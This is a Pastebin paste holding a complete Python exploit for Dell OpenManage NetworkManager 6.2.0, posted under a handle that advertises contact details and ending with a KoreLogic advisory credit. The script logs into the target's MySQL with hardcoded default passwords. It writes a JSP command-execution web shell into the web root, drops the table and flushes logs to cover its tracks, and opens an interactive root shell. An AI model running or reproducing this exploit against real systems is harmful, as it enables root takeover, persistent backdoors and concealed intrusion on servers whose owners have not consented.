SHARE
TWEET

[DELL OPEN MANAGER NTW 6.2.0] SQL BACKDOOR [PY] 08/11/18

xB4ckdoorREAL Nov 8th, 2018 (edited) 240 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD: https://discord.gg/QDy3bUy OR ADD ME ON SKYPE. b4ckdoor.porn
  2. #!/usr/bin/python
  3.  
  4.      # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
  5.      # Dell OpenManage NetworkManager 6.2.0.51 SP3
  6.      # SQL backdoor remote root
  7.      #
  8.      # [-] Starting attack.
  9.      # [+] Connected using root account.
  10.      # [+] Sending malicious SQL.
  11.      # [+] Dropping shell.
  12.      # [-] uid=0(root) gid=0(root) groups=0(root)
  13.      #
  14.      # # uname -a
  15.      # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  16.  
  17.      from optparse import OptionParser
  18.      from string import ascii_letters, digits
  19.      from random import choice
  20.      from re import compile as regex_compile
  21.      from urllib import urlopen
  22.      import pymysql.cursors
  23.  
  24.      banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
  25.      accounts = ['root','owmeta','oware']
  26.      password = 'dorado'
  27.      regex = regex_compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
  28.  
  29.      full_path = '/opt/VAroot/dell/openmanage/networkmanager/oware/synergy/tomcat-7.0.40/webapps/nvhelp/%s.jsp' % (''.join(
  30.          [choice(digits + ascii_letters) for i in xrange(8)]))
  31.      shell_name = full_path.split('/')[-1]
  32.  
  33.      backdoor = """<%@ page import="java.util.*,java.io.*"%>
  34.     <%
  35.     if (request.getParameter("cmd") != null) {
  36.         String m = request.getParameter("cmd");
  37.         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
  38.         OutputStream os = p.getOutputStream();
  39.         InputStream in = p.getInputStream();
  40.         DataInputStream dis = new DataInputStream(in);
  41.         String disr = dis.readLine();
  42.         while ( disr != null ) {
  43.             out.println(disr);
  44.             disr = dis.readLine();
  45.         }
  46.     }
  47.     %>
  48.  
  49.     def do_shell(ip_address):
  50.         fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % ('sudo sh -c id'))
  51.         print "[-] %s\n" % fd.read().strip()
  52.         fd.close()
  53.         while True:
  54.             try:
  55.                 cmd = 'sudo sh -c %s' % raw_input("# ")
  56.                 if ('exit' in cmd or 'quit' in cmd):
  57.                     break
  58.                 fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % (cmd))
  59.                 print fd.read().strip()
  60.                 fd.close()
  61.             except KeyboardInterrupt:
  62.                 print "Exiting."
  63.                 exit(0)
  64.         return False
  65.  
  66.     if __name__=="__main__":
  67.       print banner
  68.       parser = OptionParser()
  69.       parser.add_option("--host",dest="host",default=None,help="Target IP address")
  70.       o, a = parser.parse_args()
  71.       if o.host is None:
  72.           print "[!] Please provide the required parameters."
  73.           exit(1)
  74.       elif not regex.match(o.host):
  75.           print "[!] --host must contain an IP address."
  76.           exit(1)
  77.       else:
  78.           print "[-] Starting attack."
  79.           try:
  80.               for user in accounts:
  81.                   conn = pymysql.connect(host=o.host,
  82.                                          user=user,
  83.                                          password=password,
  84.                                          db='mysql',
  85.                                          cursorclass=pymysql.cursors.DictCursor
  86.                                         )
  87.                   if conn.user is user:
  88.                       print "[+] Connected using %s account." % (user)
  89.                       cursor = conn.cursor()
  90.                       print "[+] Sending malicious SQL."
  91.                       table_name = ''.join(
  92.                           [choice(digits + ascii_letters) for i in xrange(8)])
  93.                       column_name = ''.join(
  94.                           [choice(digits + ascii_letters) for i in xrange(8)])
  95.                       cursor.execute('create table %s (%s text)' % (table_name, column_name))
  96.                       cursor.execute("insert into %s (%s) values ('%s')" % (table_name, column_name, backdoor))
  97.                       conn.commit()
  98.                       cursor.execute('select * from %s into outfile "%s" fields escaped by ""' % (table_name,full_path))
  99.                       cursor.execute('drop table if exists `%s`' % (table_name))
  100.                       conn.commit()
  101.                       cursor.execute('flush logs')
  102.                       print "[+] Dropping shell."
  103.                       do_shell(o.host)
  104.                       break
  105.           except Exception as e:
  106.               if e[0] == '1045':
  107.                   print "[!] Hardcoded SQL credentials failed." % (e)
  108.               else:
  109.                   print "[!] Could not execute attack. Reason: %s." % (e)
  110.               exit(0)
  111.  
  112. ###############################################################################################################
  113. The contents of this advisory are copyright(c) 2018
  114. KoreLogic, Inc. and are licensed under a Creative Commons
  115. Attribution Share-Alike 4.0 (United States) License:
  116. http://creativecommons.org/licenses/by-sa/4.0/
  117.  
  118. #  [2018-11-08]  #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top